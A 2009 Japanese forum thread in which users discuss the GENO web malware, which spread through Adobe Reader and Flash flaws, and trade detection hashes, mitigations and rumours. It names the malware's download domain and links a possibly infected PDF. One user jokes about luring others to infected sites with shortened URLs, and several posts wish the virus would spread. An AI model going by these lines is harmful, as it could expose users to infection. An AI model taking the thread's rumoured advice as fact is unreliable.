>>571 XP、IE6、FlashPlayer9、AdobePdfReader5
だけど今のところ掛かってなかった
>>609 はっきり書いてよ
感染サイト知らずに踏む人出てきちゃうジャン
Avast!にしたらWebシールドのためにブラウザのプロクシ設定を アドレス localhost ポート 12080 にしておくこと
>>595 ソフトのマヌアルとか最近はpdfが多いから入れるしかない。
バス会社のWebで見られる時刻表もAcrobatで作っているところがボチボチあるしな。
619 :
藤(和歌山県) :2009/05/17(日) 23:56:24.47 ID:xb7a/QpL
Adobeつかわねーから アンインスコしてやった
ホームページをみていたら突然UACの確認画面が出てきて何割がはいを押さないかだけど そんなに期待していいのか?
>>575 あのファイルがわずか1kbと言うことは考えられないな。開いてみて意味不明だったらアウト確定
で、結局これ感染すると何がどうまずいの? 一般人でウィルス知識ない俺にkwsk
624 :
ポロニア・ヘテロフィア(東京都) :2009/05/17(日) 23:56:56.78 ID:BBCJlv9U
ブラスター以来の騒ぎになるの?
>>598 借り物PCがVistaだったけどいまいちUACがどんなものかわからんのだが
とりあえずメイン垢を制限ユーザにした
管理者垢作って10桁オーバーのパスつけた
これでいいのかねぇ
626 :
斑入りカキドオシ(石川県) :2009/05/17(日) 23:57:13.30 ID:JaLtUjBz
キャッシュをクリアしてください(キリッ
627 :
オウギカズラ(大阪府) :2009/05/17(日) 23:58:16.10 ID:b2j55ziw
UACすり抜けるとかちょっと考えにくいけど
そんな可能性考えてたら切りないぞw
仮想化ソフトのバグで環境内から漏れるとかいうのあったけどなw
とりあえずhipsとUAC併用で大抵防げると思う
>>606 警告の意味解らずぽんぽんクリックしてたりとか
UAC切ってたりとかしたら感染あり得る
ひとまず感染していないことはわかったけどAdobe Readerが最新版じゃないから今から最新版にしたほうがいい? それともアンインスコしたほうがいい? Adobe ReaderとAdobe Acrobat Readerって違うんだね
ブラスターがフリーザ級だとしたら GENOウィルスはどれくらい?
月曜の朝から真のパンデミックが始まるのか…
トンフルとGENOの二穴攻め・・・ もういくしかねえな・・・
sqlsodbc.chmのサイズで感染かどうか判別してたけど 亜種は無理なんだって? ハッシュで判断すればいいんじゃないの?
>>593 XPをメインで利用していたのがあだになったよな
>>616 サイトは大丈夫だよ多分。
ただ、社員数がパネェから保守連中が死ぬだろうなw
会社のPCとか勝手にフリーソフトとかインスコ出来ねーからな デフォルトであどべ製品インスコされてるわ こりゃ知らずに感染しちまうかも試練
>>614 作った奴らなら簡単にその無理をこじ開けちゃいそうな気がする。
まぁ完璧なんてのはないよ。あったらアンチウィルスソフトやスパイウェアなんていらないしな。
637 :
ボケ(アラバマ州) :2009/05/18(月) 00:00:11.65 ID:JqrHXXra
ところで、サイト→個人への感染はまあ何時もの手口だけど サイトへの感染源はどうなってるの?管理者のPCがやられた?この広がりだと考え難いけど 感染者が閲覧しただけで広まるってことはないだろうし・・・
たな「Webウイルス」が猛威、感染被害が急増 英ソフォスが報告、正規サイトでもWebアクセスで被害の恐れ //itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/ このウイルスをWebページに埋め込む。 そのページにユーザーがアクセスすると、埋め込まれたウイルスが動き出し 別のウイルスを勝手にインストールされる恐れなどがある。 通販サイトやウェブメール等、WEBブラウザを介したWEBサービスで利用する IDやパスワード、クレジットカード情報等の個人情報が抜かれる可能性もあります。 サイト管理人は自サイトのソースを見ることで書き換えを確認することができます。 >623
>>632 いつまでもsqlsodbc.chmを改竄し続けてるとも限らないよ
もう既に違うファイルの改竄に切り替えてる可能性もある
>>596 UACを突破してWindowsフォルダ内を弄られるなことがあればそれは重大な欠陥となるな
>>64 UACというがPCのパスがわかったらUACは突破できるよ
644 :
オキザリス・アデノフィラ(東京都) :2009/05/18(月) 00:02:34.88 ID:OT2LLMTM
Windows NTには詳しくないんだけど ドメイン参加していて制限かけていれば システム絡みってユーザ権限じゃ変更出来ないんだよね? でないと、感染したサイトが何らかの対応を今夜中にしてくれないと 明日から関連会社が大変なことになるんだが。
PDFとFLVって半分ウィルスインストーラと化してるよなあ Adobe社内でスクリプトエンジン開発してる奴ら無能すぎる
>>609 23Fとか隣のビルの5Fとかはマクばっかだぞ
XPメインユーザが狙い打ちって本家の陰謀? Vista買ってただちに7に乗り換えて金落としまくれよってこと?
>628 使わないなら削除 使うならAdobe reader 9.1.1とか最新のにアップデート
649 :
シュッコン・バーベナ(アラバマ州) :2009/05/18(月) 00:04:08.07 ID:pHEo3uw6
情弱だからしばらくネットで遊ぶ気になれないぜ・・・
adobeの脆弱性のせいで感染してるってことでいいの? それならばadobe製品を全力で消すが
陰謀なわけないし だいたい、陰謀かどうかなんて関係ないだろ
653 :
エビネ(ネブラスカ州) :2009/05/18(月) 00:05:01.96 ID:LSTNNSqz
明日から会社マジやべぇな。 pdfファイルばっかりだから使わないわけにもいかんし…
>>645 MSエクセルが必死こいてマクロを無効化したってのにな
結局、マクロの時みたいに実行時にスクリプトを実行しますがよろしいですか?って聞くようにするしかないのか
市況板の住人とか 感染多そうな感じするがな・・ 株やってると PDF読める環境は必須だし・・・
でも、企業のPCなんてXPばかりだし、Adobe Readerなんか更新欠けていない奴がほとんどだし 本格的にやばいんじゃね?
657 :
オウバイ(大阪府) :2009/05/18(月) 00:07:11.01 ID:ker7VPvN
ハッシュ値も見たけど変化無し、クリーンインスコめんどくせ *'``・* 。 | `*。 ,。∩ * もうどうにでもな〜れ + (´・ω・`) *。+゚ `*。 ヽ、 つ *゚* `・+。*・' ゚⊃ +゚ ☆ ∪~ 。*゚ `・+。*・ ゚
>>646 へーそうなんだ。隣5Fはいいとして、23Fって何の部署んとこだろ…?
と、>644辺りがもうそこの関係者とかに見えてくるんだがw
でも、ドメイン&ユーザー権限で管理してる所も多いだろう品
ああ、ここ見てたら 実家の親と兄弟のPCが心配になってきたわ… 情弱揃いだからなあ
662 :
スズメノヤリ(東京都) :2009/05/18(月) 00:08:09.05 ID:vx7e3KBK
デスクトップのキャプとマイドキュメントとkakikomi.txt流出させる亜種作られないかなw
663 :
オオイヌノフグリ(静岡県) :2009/05/18(月) 00:08:09.28 ID:mM9Gb6La
うちの会社大丈夫かしら
>653 こわければ 編集 環境設定から adobe javascriptを使用のチェックを外す
もし会社のPCで感染したらどんな不都合がある? 重要なデータが入ってるPCならクビになったりするかな?
667 :
ヒメオドリコソウ(山陰地方) :2009/05/18(月) 00:09:52.30 ID:1QBc68Js
ちょっと、そこらじゅうの会社のPCが麻痺したら不況が加速すんじゃん すごいなウィルスww
668 :
イヌノフグリ(東京都) :2009/05/18(月) 00:10:12.27 ID:9D8amyXN
サイトに感染って一体何なんだおおん
669 :
マーガレット(東京都) :2009/05/18(月) 00:10:17.36 ID:2DMFEIFc
MSBlastは笑った 月に2,3度しか使わない妹のPCも、会社のデータ参照するだけの同僚のノートも感染とか
670 :
ミヤマアズマギク(dion軍) :2009/05/18(月) 00:10:31.46 ID:ii1Tzdoq
adobe readerはアップデートしたがflash playerってなんだ
671 :
バラ(北海道) :2009/05/18(月) 00:10:32.99 ID:GqIy1LGA
>>667 そこで儲かることをすれば
君も立派なビジネスマン
自称情報強者のXP厨さん達ならこんなの屁でもないだろ
怪しい情報を送受信してる 弾かなきゃならんIPは増え続けてるんだよな どこかに一覧があると良いんだが ああ、実家のルーター設定に飛んで行きてえ…
>639 まぁしばらく巡回しないのとcmdの起動とハッシュ値はみておくけど 面倒クサイ亜種だなぁ、ったく・・・ 正常な状態のやつね sqlsodbc.chm ファイルサイズ:50,727バイト CRC32:B61C7A80 MD5:F639AFDE02547603A3D3930EE4BF8C12 SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
avastなら安心なの?
677 :
ポピー(長崎県) :2009/05/18(月) 00:11:54.70 ID:SD6G7ePy
>>666 あれ?過去ログに首になった人の書込みがあったはず・・・
会社のPCでいろんなもの落としててそれ全部上司に見られたって
上に不具合報告する前にこのスレ見とけばよかったって泣いてたよ
678 :
タツタソウ(静岡県) :2009/05/18(月) 00:11:59.10 ID:eEziWn+k
ハッシュ値ってどうやってみるんだろ ぐぐるの面倒だから教えてくれ
亜種亜種言われてるけど具体例出てなくね?
>>675 検出の可能性が「ある」ってレベル。駆除までできる対策ソフトは現状存在しない。
つか、現状ウイルスの動作を完全に把握できてる情報源が無い。
だからこそ、システムの再インスコしかないって言われてる。
681 :
オキザリス・アデノフィラ(東京都) :2009/05/18(月) 00:12:40.82 ID:FL9uQAvB
>>666 その感染したマシンでFTP使用すると、IDとパスワード流出。
接続にID、PASSWD以外の制限が掛かっていないと
漏れたIDとPASSWDを使用しているサーバの中身を
全部チェックする羽目になる。
亜種とかで、そのクライアントからサーバのデータ書き換えまで
するようになったら、IP制限をかけてるサーバでも
感染元に早変わり。マジ勘弁してくれ。
>>666 クビにはならんが、おまえと上司には減給なり戒告なりの処分はあるだろう
683 :
シザンサス(アラバマ州) :2009/05/18(月) 00:13:12.38 ID:jznykNpy
684 :
アカシデ(東京都) :2009/05/18(月) 00:13:21.34 ID:whIZ9qIO
会社のパソコンに関しては出社前に上司に経緯知らせて、自分が使うPCは速攻アプデトするしかなく音
685 :
オキザリス・アデノフィラ(東京都) :2009/05/18(月) 00:13:56.47 ID:FL9uQAvB
>>673 そのためのリモートアシスタント機能じゃないか。
>>675 あくまでひとまずは、だろ
なんかね、管理者から制限ユーザに切り替えたらいろいろ違うとこ出てきて違和感バリバリだから戻した・・・
最新版への以降・FoxitもJavascript禁止・avastのwebスキャナーONですり抜けられたらもう諦めるわ・・・
出版社のホムペだと一瞬.cnチラっと見えたがなんともない 入ってるFlashのバージョンがウイルシを寄せ付けないんだろう PDFはFoxitでJS関連のコンポーネントは入れてないのでおkだろう
689 :
オオイヌノフグリ(静岡県) :2009/05/18(月) 00:16:37.09 ID:mM9Gb6La
ダミアンw
>>679 出し様が無いと思う。
強いて挙げるなら、regedit, cmdが起動可能な亜種が出てる。
後は埋め込まれるJSにChromeが追加されてる。
核となるファイルもランダム生成されてて、感染してるか否かも判断し難い。
殆どのウイルスベンダが対応出来て無い現状。
俺は情弱なんだと思い知らされた
>>29 を信じてやったら
ネットに接続できなくなった\(^o^)/
こいつの文章コピペしてたからなんとかなったけど
危うくリカバリってレベルだ
結局俺はお前らに搾取される存在なんだな
というかだなブラウザもかえとけと IE系はファイルをOFficeで流用してる可能性があるから
vistaは大丈夫って聞いたけどどゆこと? 教えてエロい人
694 :
シザンサス(アラバマ州) :2009/05/18(月) 00:18:33.88 ID:jznykNpy
695 :
ベゴニア・センパフローレンス(神奈川県) :2009/05/18(月) 00:18:44.38 ID:/ho4xK2D
すごいウイルスが出てきたもんだな
>>686 そこまでやって感染したらそれはもう新種
697 :
桜(福岡県) :2009/05/18(月) 00:19:39.85 ID:K80uLwbM
940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf ID:8fz7e8f5 ですが自宅のPCから書き込み 自主退社という形になりました 逝ってきます このウイルスが世界中に広がりますように
698 :
ニガナ(千葉県) :2009/05/18(月) 00:19:54.17 ID:iXhr/OZs
外に出れば新型インフルの猛威、仮想世界に飛び込んだらGENOウイルスの恐怖。 無職引きこもりはどうすればいいの?
>>692 プルニが一番使いやすい。Operaとか火狐は使いにくくて涙目なんだよな。
本当にPC版のエイズウイルスみたいだな どれほどの悪意がこれを生み出したのか
703 :
シュッコン・バーベナ(アラバマ州) :2009/05/18(月) 00:20:43.32 ID:2GcPGtJu
>>691 真の情弱の俺は見ない弄らない触らないだ
まとめサイトも怖いから見ないぜ
704 :
マムシグサ(岡山県) :2009/05/18(月) 00:20:55.30 ID:uKaX8zMq
sqlsodbc.chmについて キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば あいうえお は おえういあ らしい。つまり 感染しててまだFTP使用してないとsqlsodbc.chmはデフォのままで 感染確認としては弱いかもね 時既に遅しの場合のみ確認が出来るって感じかな
705 :
バラ(北海道) :2009/05/18(月) 00:20:59.96 ID:GqIy1LGA
>>699 数日したらOperaか火狐は手放せなくなる存在だから
この機会に乗り換えとけ
>>700 「お金欲しい」っていう比較的単純な欲望だと思われ。
ダシにされるこちらはたまったものじゃないが。
707 :
ショウジョウバカマ(関西) :2009/05/18(月) 00:21:46.77 ID:c1H9H+uI
ハッシュ値とかMD5ってなんだ。わからん プロパティにそんなもんねーぞ
708 :
イヌノフグリ(東京都) :2009/05/18(月) 00:22:01.30 ID:9D8amyXN
もうネットは大学のパソコンからしかやらぬ
709 :
マーガレット(東京都) :2009/05/18(月) 00:22:10.61 ID:2DMFEIFc
225時価総額上位の企業サイトが感染したらIR経由で凄いことにならないかな 100%Reader使ってあるから
710 :
フリージア(北海道) :2009/05/18(月) 00:22:14.73 ID:pHiEJvHU
711 :
桜(福岡県) :2009/05/18(月) 00:22:28.08 ID:K80uLwbM
10 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 10:04:30.21 ID:8fz7e8f5 GENOよりも短縮貼った奴が許せない 21 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 10:08:03.67 ID:8fz7e8f5 たまご氏ね 144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5 自宅謹慎になったわ 160 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 11:02:51.43 ID:8fz7e8f5 もう会社行けない もしかして俺が一番被害大きいんじゃねえの? 185 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 11:09:24.52 ID:8fz7e8f5 お前ら鳥インフルエンザにかかって死んでしまえ ~~~~~~~~~~~~~~~~~~~~~~~~~ このときすでにGENOウィルスとインフルエンザの新種を予言していたのか。
712 :
マーガレット(コネチカット州) :2009/05/18(月) 00:22:38.30 ID:NMisL4cT
713 :
クレマチス(コネチカット州) :2009/05/18(月) 00:22:54.71 ID:wcxMf4Dr
だから、電源オフもしたらアカンし、 再起動もしたらアカンのかよOrZ 寝れねぇ〜〜〜〜
714 :
オウバイ(大阪府) :2009/05/18(月) 00:22:58.23 ID:ker7VPvN
>>29 これってfirewallで閉じといたほうが楽じゃね
にしても去年後半あたりから445ポートへのアクセスがすごいことになってるなw
ネットを根絶し再び視聴者を取り戻そうとする、 TV原理主義者達の陰謀だったんだよ!
716 :
ポピー(長崎県) :2009/05/18(月) 00:23:11.01 ID:SD6G7ePy
しかしこうなってくると、携帯厨が「ざまあああああwwwww」って喜ぶのが目に見えて なんかイラッとくる
717 :
イヌガラシ(大阪府) :2009/05/18(月) 00:23:22.13 ID:QqlJkDir
718 :
タマザキサクラソウ(東京都) :2009/05/18(月) 00:23:35.26 ID:RIR9Bq1S
>711 これ一体どういう経緯の話なんだ?
>>696 でも実際どうなるかわかんねーじゃん?
今からとりあえず全ドライブavastでもう一回検査して、問題なければ消えたら嫌なデータを外付けに移して
外付けはしばらく封印するわw
>>702 安心ってのは分かるんだけどね・・・
でもふと気づいたときにサービスやらプロセスやらいじれないのはなんか嫌というか・・・
ていうか制限ユーザにしたらタスクトレイにavast表示されないんだよね・・・
720 :
アカシデ(東京都) :2009/05/18(月) 00:24:47.58 ID:whIZ9qIO
721 :
オウバイ(大阪府) :2009/05/18(月) 00:25:01.85 ID:ker7VPvN
>>719 新ユーザー作ってそっちを管理者にすればよくね
タスクトレイは通知領域いじってもだめなのか?
>>697 こういうやつらって2chをアングラサイトと認識してんのかな
>>711 >鳥インフルエンザ
>鳥インフルエンザ
>鳥インフルエンザ
>>683 いや、Meもダメだったんじゃね?
RPCの脆弱性付く奴だったから
726 :
ニガナ(東京都) :2009/05/18(月) 00:27:59.26 ID:zpP0Syph
>>718 汚染中のGENOへの短縮URL貼ってた馬鹿がいて、その短縮URLをzipと勘違いした馬鹿がいたって話
727 :
ハナワギク(dion軍) :2009/05/18(月) 00:28:08.06 ID:RsWM+D3f
>>699 一昨日までプニルだったけどopera使いやすいぞ
火狐はなんか面倒だったけど、operaは使いやすいわ
>>682 このご時世じゃ解雇の理由の一つになりかねないけどな
729 :
タツタソウ(静岡県) :2009/05/18(月) 00:28:27.45 ID:eEziWn+k
このウイルス作った奴死ねばいいのにねー
730 :
シザンサス(アラバマ州) :2009/05/18(月) 00:28:27.88 ID:jznykNpy
>>718 前回Geno自体が初出のときに、
Genoのアドレス(www.geno-web.jp)についてさえ気を付けてれば良いと思って油断してた奴らが
TinyURL.comみたいなサイトを使った短縮URLに騙されてアドレスを踏んじゃった
>>718 会社からネットやってたらうっかりGENO踏んじゃって信用丸つぶれってとこじゃないか?
俺んとこでは考えられん情報リテラシーだが……
>>718 休日出勤してるときに会社でzip落としてて
誰かが貼り付けた短縮アドレスでgenoウイルス食らって
首になった人
//www■pref■fukushima■jp/jidou/gakkoutebiki/q8-10■pdf このサイトやばい?
危険度1000%踏んだけど無事っぽい
735 :
ロウバイ(dion軍) :2009/05/18(月) 00:29:36.62 ID:JZibt8g2 BE:239172645-2BP(0)
ハッシュも正常な値だった avastも前から入ってたし 感染はしてないっぽい さて 明日は職場のマシン総チェックだ 大半は制限ユーザーだから問題ないだろうけど めんどくせーな
737 :
ねこやなぎ(青森県) :2009/05/18(月) 00:30:14.11 ID:Vcczn7qt
明日以降エロzipスレに短縮URLでウィルスサイト踏ませるか
>>721 それはやった
通知領域いじるのg(ry
ていうかそもそも互換シェル使ってるからそっちの問題もあるし、そしてファイル移すのめんどいから外付け以外はもうどうにでもなーれ
もうなんか今回の件で自分がどれだけチキンか思い知ったわ
安心できねぇ・・・
739 :
タマザキサクラソウ(東京都) :2009/05/18(月) 00:30:38.78 ID:RIR9Bq1S
>726>730 解説サンクス。で会社からアクセスした奴がいたのかw しかもzipと誤認てw
>707 ファイルを少しでも改変したらハッシュって呼ばれる文字列も変わってしまうんだよ >717は右クリプロパティで観れるソフト ↑をいれないとみれないよ
>>737 やった奴らは掘られてるからね
まぁ猶予扱いだったはずだが
743 :
ガーベラ(大阪府) :2009/05/18(月) 00:31:20.89 ID:8Dk4dMgE
744 :
カキツバタ(長野県) :2009/05/18(月) 00:31:20.44 ID:/XN5olg7
こんなウイルスだらけのインターネッツに居られるか! 私は自分の部屋で寝かせてもらう!
745 :
ねこやなぎ(青森県) :2009/05/18(月) 00:31:28.01 ID:Vcczn7qt
>>697 私用ネット程度で退職に追い込む会社って・・・
むしろ辞めて正解じゃないの?w
GENOにかかったところで上司が戒告食らう程度だろ、普通は。
747 :
シザンサス(アラバマ州) :2009/05/18(月) 00:32:46.75 ID:jznykNpy
>>742 複数板で報告されても2レスまでなら大丈夫だよね!
749 :
スズメノヤリ(東京都) :2009/05/18(月) 00:32:56.86 ID:s+nyZ3fG
GENOに掛かるって事が企業にとってどれだけやばいか分かってないなお前
ネットじゃGENOウィルス 巷では豚インフル しかも関西で二次感染出現したみたいだし 電車乗るのやだなー
>>745 それが一番だが先立つものがね・・・
VMいれてubuntuあたりでネット巡回しようかな・・・
ページ読み込んでる時に閉じたけどせーふ? cmdとか起動した なんとかのディスクサイズも大丈夫だった
755 :
シラー・カンパヌラータ(コネチカット州) :2009/05/18(月) 00:34:42.69 ID:qg9pk2qQ
GENOウイルスと豚インフルウイルスってどっちが強いの?
個人のPCは、7も年末には発売されるし、 コレを期に7のRC入れて年末までがんばるかな 会社のPCはシステム部門の奴らが面倒見てるから、 もうどうにでもなーれ状態だなw
むふーなんだか困った感じだね
758 :
ポピー(長崎県) :2009/05/18(月) 00:35:07.11 ID:SD6G7ePy
とりあえずSP1か2だがフラッシュプレーヤーとリーダーを最新にした俺は生き残れるかな
>752 再起動で異変がないか、とタスクマネージャでCPUの使用率に異常がないかチェック あとはマトメサイトでもみるといいんじゃないかな
>>711 こいつが死霊のえじきで基地にゾンビを引き込む奴に見えてきたわ
いまさっきGENOウイルス流れてるって知ったわ とりあえずは大丈夫みたいだが、おそろしい・・・
豚インフルは弱毒性だし薬剤が効くだけマシだろ
749 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2009年05月18日(月) 00:33:18 ID:kOR/iv040 (PC) コマンドプロンプトとregeditが起動できる亜種が出回り始めたらしい(´・ω・) ス
766 :
オオイヌノフグリ(静岡県) :2009/05/18(月) 00:37:34.36 ID:mM9Gb6La
>>764 タミフル、リレンザともに有効らしいからな
767 :
タツタソウ(静岡県) :2009/05/18(月) 00:37:48.24 ID:eEziWn+k
これウイルス駆除ソフトほとんど意味がないって事だよね この先対応できるのかしら
768 :
アメリカヤマボウシ(東京都) :2009/05/18(月) 00:37:50.11 ID:X/fxqi3q
Sleipnirなら オプション→ビュー→Tridentで デフォルトをJS無効、ActiveXの実行を許可しないようにすればOK
その亜種に感染した人はいるのか
770 :
タマザキサクラソウ(東京都) :2009/05/18(月) 00:38:03.76 ID:RIR9Bq1S
>746 感染だけならシステムの復元でクビは繋がった気がするw
同人板のスレでコテハンが湧き始めたな 正直自治厨はがウザイから消えて欲しいんだが どWikiみれば現時点での対策は全部できるんだしイラネ
772 :
ポピー(長崎県) :2009/05/18(月) 00:38:19.93 ID:SD6G7ePy
他板より
401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
作成されるファイルを仮想PCで確保してみました。
ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)
gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
qlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
433 名前:401[sage] 投稿日:2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416 嫌なことに、特に異変がない。
cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。
あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。
同人板その他、パンデミック状態になったの理解できるわ。
Noscriptを設定して
>>38 のサイトを踏んだが問題なかったぜ
774 :
ウバメガシ(アラバマ州) :2009/05/18(月) 00:39:11.98 ID:3yhD2piE
アドビにはアクセスして平気なのか?
またvista大勝利か
>>756 面倒見るほうのみにもなってくれよ
通常業務+全台チェック&対策
全社員への徹底周知
おじさん泣いちゃいそうだよ
>>704 試しに ftp localhost とかやって接続に失敗させてみると、どうなるかな?
書き換わるのなら、感染確認に利用出来そうな気がするんだけど。
778 :
ニガナ(東京都) :2009/05/18(月) 00:40:54.51 ID:zpP0Syph
>>733 今virustotalに投げてるけど、何かあったのか?
こういうときだけvistaたんは役に立つ ツンデレなんだね
780 :
ケンタウレア・モンタナ(福岡県) :2009/05/18(月) 00:41:29.61 ID:Rd0s9LV8
不用意にネットサーフィンしなければ感染しないんでしょ?
VistaでUACを有効にしてる奴なんているのか? あれ異常に邪魔だろ・・・
782 :
サクラソウ(関東・甲信越) :2009/05/18(月) 00:42:00.01 ID:BsWrPXAR
ネットもリアルもフェーズ6に移行直前かよ 今のところvistaんが頑張ってるけど亜種にスルーされたらと思うとネット出来ねえ
>>780 javascript切ってればとりあえずいいよ
Win7マシンで成美堂出版見てきて、avastインスコして再起動後のスキャンで、 c:users/userneme/appdata/local/microsoft/windows/tenporary internet files/low/content.IE5/RY64BB4P/の ディレクトリでJS:Redirector-H4確認 発症はしてないと思うけど、ヤバイサイトは見に行かない方が良い
ていうかさ、今回のコレってFTP使用しないPCだと感染してもほぼ無害ってこと? それとも、FTPのID/PASS強奪はあくまで一面で、キーロガー的に外部にパスとかもらしちゃうの?
>>762 安全だって事は確実
ただ意味が分からない
>>776 マジでお疲れさまッス
うちの会社ではたぶん明日はなんもお触れまわらんだろうな(泣
朝一で全社員へメール流れていたら奇跡だわ・・・orz
790 :
シザンサス(アラバマ州) :2009/05/18(月) 00:44:18.40 ID:jznykNpy
>>781 家出るときに鍵かける奴なんているのか?と同レベル
791 :
シナノナデシコ(関東・甲信越) :2009/05/18(月) 00:44:20.50 ID:UkdoReae
もうネトサフできないじゃねえかorz
>>776 Javascript切らせますか?現実的じゃない気がして
>>786 FTPの盗聴はあくまで艦船を広げるためのものだろう
後ろでbotnet起動したりしてるみたいだから油断はしない方がよさそうな
794 :
シラン(コネチカット州) :2009/05/18(月) 00:44:35.98 ID:tFVgFEbp
Vista+IE8保護モード最強他はクソ
795 :
ラッセルルピナス(茨城県) :2009/05/18(月) 00:44:46.24 ID:3lnjSZJ3
これはMSの陰毛だな
具体的な被害ってあるの? 情報流出先はわからんの?
>>746 50 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。
162 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。
204 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございますけど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。日曜出動までして何してんだろ俺?もう帰宅します。明日上司になんて説明しようか?
995 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。
144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ
940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように
55 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:35:10.80 ID:AhXwTJEf
釣りだと思われるのはしゃくなので
IEの強制終了のせいで発注できず
ウイルスの原因が2CHでエロZIp
PCと自前のHDD回収される
生き恥をさらす
大量のロリ画像で性犯罪者扱い
どぷするの?と上司
自主退社←今ここ
このスレに気づかずに管理人に連絡とったのが悔やまれる
Vista最強伝説 Opera最強伝説
対策はしたけど気持ち悪いよう
sqlsodbc.chmを探してたら、spider.exeっていう怪しいファイルが入ってた。 ちょっとWクリックしたら、なんかトランプがたくさん出てきたんで慌てて×を押した。 これウイルスバスターで消したほうが良い?
801 :
姫カンムリシャジン(石川県) :2009/05/18(月) 00:47:00.87 ID:DSuVx5x2
802 :
オウバイ(大阪府) :2009/05/18(月) 00:47:38.91 ID:ker7VPvN
UACの何がめんどくさいんだよw インスコの時ぐらいだろ出てくんの デジタル署名がないって言ってくるならブロック解除してやればいいし意味がわからん 一日一回でるかでないかの話なのに
804 :
オキザリス(新潟県) :2009/05/18(月) 00:47:52.81 ID:dejPNUbF
インターネット詳しくないけどvista大丈夫のようね。よかった。
805 :
ケンタウレア・モンタナ(福岡県) :2009/05/18(月) 00:48:47.35 ID:Rd0s9LV8
>>797 明日会社行ってこんな話になってたら引く
806 :
ニガナ(東京都) :2009/05/18(月) 00:48:48.38 ID:zpP0Syph
JavaScriptだけで見るとそれ切るだけで別に済むんだけど 問題の本質はAdobe ReaderとFlashの脆弱性だからな
807 :
ポピー(コネチカット州) :2009/05/18(月) 00:48:50.78 ID:/5XkzXo8
これってウィルスバスターで検索かければウィルス見つかります?あと これを機にインターネットエクスプローラ7からoperaに乗り換えようと思うのだが如何?ちなみに今はVista32ビットです
810 :
キショウブ(長屋) :2009/05/18(月) 00:49:31.74 ID:Cz9BcG1j
>>806 Adobe ReaderとFlash Playerも中で使ってるJavascriptが脆弱性の原因だったり
あれ?JavaScriptが死ねばよくね?
813 :
ニガナ(東京都) :2009/05/18(月) 00:51:31.86 ID:zpP0Syph
>>812 結局そうなんだけど、一歩間違うとブラウザのJavaScript切るだけで良いんだーになりかねないからね
アップデート忘れんなと
>>792 まずAdobeとか最新Verになってるか確認
なってなきゃ例の確認方法してみる
Javascriptはどうすんだろうね
上の人間がどう判断するかはわからん
ま自分と上司以外は制限ユーザだから大丈夫だとは思うけど
ftp localhost じゃなくて、anonymous サーバに接続してみるという方法もあるな…
やばそうな感じ出してるけどパート5ってどういうことなんだ? そんなにやばくないのか?
817 :
オランダミミナグサ(東京都) :2009/05/18(月) 00:54:17.84 ID:0LOIUa0M
>>797 ああこれ俺だ
無事再就職できました
もっとGENOウイルス広まれよ
818 :
ムラサキハナナ(中部地方) :2009/05/18(月) 00:54:29.53 ID:LHIAkNmf
飽きてきた
>>816 大騒ぎしている人間も居るが冷静な判断をしたら
そう大変じゃなかったんだぜの巻き
820 :
桜(福岡県) :2009/05/18(月) 00:55:06.29 ID:K80uLwbM
>>787 書いてあるとおり、遮断した方が良いんじゃね?っていうIPアドレスの範囲じゃないの?
IPブロック指定マンドクセ もういいや、寝よう。 ていうか明日は会社の自分のPCも確認せにゃならんし、親のPCも心配だし
824 :
